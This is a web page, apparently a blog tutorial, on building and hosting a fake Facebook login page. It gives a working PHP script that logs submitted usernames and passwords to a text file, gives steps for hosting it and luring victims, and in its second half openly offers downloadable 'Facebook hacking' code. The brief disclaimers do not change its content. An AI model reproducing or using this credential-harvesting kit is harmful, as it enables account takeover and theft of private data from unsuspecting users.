Facebook Phishing Page Download Files



In this tutorial, we’re going to take a close look at how to setup a phishing page to harvest usernames and passwords that can be used to hack other users’ Facebook accounts. However, and I can’t stress this enough, this knowledge should never be used to attack others in the real world. It simply isn’t legal, and it isn’t moral, either. If you’ve ever had your username or password stolen, you know how bad it feels when others have violated your privacy.

On How to Hack Facebook phishing attack page (see here) there is a comment from jordin71 that asking for the new facebook offline page, because the last tutorial is the old facebook interface. Phishing scams are a hot topic lately that have grown with the popularity of online banking and social networking sites like MySpace, Facebook and Twitter.

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If you’re reading this with the hopes of learning how to gain access to countless users’ Facebook credentials, I should instead refer you to philosophical ideas on morality. Keeping that in mind, there is a lot of value, especially for aspiring hackers, in understanding how phishing works. Not only will it help you avoid mistakes that threaten your security and privacy, but it will also help you spot fishy phishing sites.

Phishing page creator

What is Phishing?

Phishing is the process of setting up a fake website or webpage that basically imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows:

A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There’s just one problem. The user, who is really the attacker’s victim, actually entered their private information into a hacker’s website. And now the hacker has their login credentials! In Facebook, this may not be as consequential as another website, like online banking.

However, the hacker can now wreak ungodly amounts of havoc on a person’s social life. If it happens to be a business’s Facebook profile, they can damage their business. Today, however, we are going to setup an imitation Facebook login page to show you just how easy it is to start phishing. Let’s take a closer look at the steps required.

  1. Pull up Facebook.com in your browser. Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.
  2. Go ahead and dump all of the page’s source code into Notepad (or your operating system’s best simple text editor).
  3. If using Notepad, hit ctrl f (which is the find hotkey) and search for action.
  4. You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1″
  5. Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action=”post.php”
  6. Save this file somewhere on your computer with the file name of index.htm. Omit the final period from the filename. This is going to become your phishing page.
  7. Next, create a new notepad document with the name of post.php. Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

  1. At this point, you should now have two files saved: index.htm and post.php.
  2. Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I wouldn’t recommend you actually post this code. Instead, it would be better to try this at home on your own webserver. However, for the rest of the tutorial, we’ll be using Bluehost.
  3. After you have signed up for an account, browse to the control panel, and then to file manager.
  4. Once the window opens, go to publick_html.
  5. Delete default.php, and then upload index.htm and post.php.
  6. Next, click on a preview of index.htm. As you’ll notice, it should look nearly identical to the Facebook login page.
  7. The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
  8. Now go back to the file manager and public_html. There should be a file labeled username.txt.
  9. Open this file and you should be able to see login credentials that have been entered by a test user.

Final Thoughts

It really is a simple matter of copying the code from the Facebook login screen, adding some php code, and then setting up a dummy website. Again, don’t try this in the real world, because the consequences could be terrible. However, in a home environment on your own web server, this tutorial provides great insight into how attackers phish for usernames and passwords.

Facebook Phishing Page Download Files

Want to Hack someone’s FB account? If yes then you are at right place. Facebook Html Hacking Code is suitable where you know that someone will definitely use your webpage and will enter facebook credentials into that page.

Facebook Phishing Page Download Files

Method # 02 = Facebook Password Sniper

How to use this Code (The Brief Guide)

  1. To Download the Html Code – Go below and find the Download button
  2. After Downloading the HTML code – extract the zip file
  3. Host these files to a Web Host. If you don’t have any hosting server. You can host these files to Google Drive – Cheers (You can always Google: How to host a static Web page to Google Drive)
  4. After hosting your Webpage – get the index.php link and follow these guidelines:

Now You have the index.php link:

Phishing Page For Facebook

After hosting your files to the Host – you need to get a link of index.php. Send this link to someone whose account you want to hack. When the victim opens your link – An FB phishing page would appear and if the victim enters the credentials you can have access to his password.

You need a Database to Store Username & Password:

After hosting this HTML code on some host you need to enter database details into this HTML code. The database will store the victim’s credentials.

Download = Facebook Hacking HTML Code